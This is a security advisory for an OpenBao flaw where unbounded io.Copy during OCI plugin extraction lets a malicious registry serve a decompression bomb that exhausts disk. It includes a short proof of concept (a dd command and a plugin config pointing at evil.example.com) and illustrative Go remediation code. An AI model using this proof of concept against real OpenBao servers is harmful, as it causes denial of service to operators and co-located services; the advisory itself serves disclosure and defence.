GHSA-r65v-xgwc-g56j

Source
https://github.com/advisories/GHSA-r65v-xgwc-g56j
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-r65v-xgwc-g56j/GHSA-r65v-xgwc-g56j.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r65v-xgwc-g56j
Aliases
  • CVE-2026-39396
Related
Published
2026-04-21T18:24:10Z
Modified
2026-04-23T20:14:13.009247548Z
Severity
  • 3.1 (Low) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L
Summary
OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)
Details

Summary

ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.

The SHA256 integrity check runs only after the full file has been written to disk, so the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allows an attacker to replace a legitimate plugin image without needing to match its configured sha256sum.

Details

Root cause

helper/pluginutil/oci/downloader.go:301:

    if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {

io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.

PoC

  1. Set up a malicious OCI registry
  2. Create a decompression bomb binary:
    dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary
    
  3. Package it in a minimal OCI image
  4. Push to the malicious registry
  5. Configure victim OpenBao to use this registry:
    plugin "secrets" "bomb" {
      image       = "evil.example.com/plugin"
      version     = "v1.0.0"
      binary_name = "openbao-plugin-secrets-bomb"
      sha256sum   = "0000000000000000000000000000000000000000000000000000000000000000"
    }
    plugin_auto_download = true
    
  6. Start OpenBao (or send SIGHUP); the OCI image is loaded and the disk fills, causing a DoS

Impact

  • Denial of Service: Disk exhaustion on the OpenBao server
  • Cascading failure: Co-located services (databases, other apps) also fail when the disk is full
  • Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up
  • Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded

Remediation

  1. Validate header.Size against a configurable maximum before opening the output file
  2. Wrap tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy
  3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
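The following is an added illustration of the remediation steps above, not OpenBao's own code: extractBinary validates header.Size before any byte is written, then copies through io.LimitReader(maxSize+1) so a stream that outruns the limit is caught by the byte count rather than by a full disk. The function names, the in-memory tar fixture built by buildTar, and the ErrTooLarge sentinel are assumptions for the demo.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
)

var ErrTooLarge = errors.New("plugin binary exceeds max_size") // returned when an entry is over the bound

// copyBounded is the proposed fix for the unbounded io.Copy: read at most maxSize+1 bytes
// so an oversized stream is caught by the byte count instead of by a full disk.
func copyBounded(dst io.Writer, src io.Reader, maxSize int64) (int64, error) {
	n, err := io.Copy(dst, io.LimitReader(src, maxSize+1))
	if err == nil && n > maxSize {
		err = ErrTooLarge
	}
	return n, err
}

// extractBinary walks a tar stream (standing in for the mutate.Extract output), finds the entry
// named binaryName and copies it to dst. header.Size is rejected before anything is written.
func extractBinary(tarStream io.Reader, binaryName string, maxSize int64, dst io.Writer) (int64, error) {
	tr := tar.NewReader(tarStream)
	for {
		hdr, err := tr.Next()
		if err != nil { // io.EOF here means the binary is not in the image
			return 0, fmt.Errorf("reading image for %q: %w", binaryName, err)
		}
		if hdr.Name != binaryName {
			continue
		}
		if hdr.Size > maxSize {
			return 0, fmt.Errorf("%w: header declares %d bytes, limit %d", ErrTooLarge, hdr.Size, maxSize)
		}
		return copyBounded(dst, tr, maxSize)
	}
}

// buildTar builds an in-memory tar with one all-zero entry (constructed fixture, not an image).
func buildTar(name string, size int) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	tw.WriteHeader(&tar.Header{Name: name, Mode: 0o755, Size: int64(size)})
	tw.Write(make([]byte, size))
	tw.Close()
	return buf.Bytes()
}
```

With a 1 MiB limit, a 4 KiB entry copies in full while a 2 MiB entry is refused before the output file receives a single byte.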
Database specific
{
    "cwe_ids": [
        "CWE-400",
        "CWE-674",
        "CWE-770"
    ],
    "github_reviewed": true,
    "nvd_published_at": "2026-04-21T01:16:06Z",
    "github_reviewed_at": "2026-04-21T18:24:10Z",
    "severity": "LOW"
}
References

Affected packages

Go / github.com/openbao/openbao

Package

Name
github.com/openbao/openbao
Purl
pkg:golang/github.com/openbao/openbao

Affected ranges

Type
SEMVER
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
0.0.0-20260420180337-2b2a901aa9f7

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-r65v-xgwc-g56j/GHSA-r65v-xgwc-g56j.json"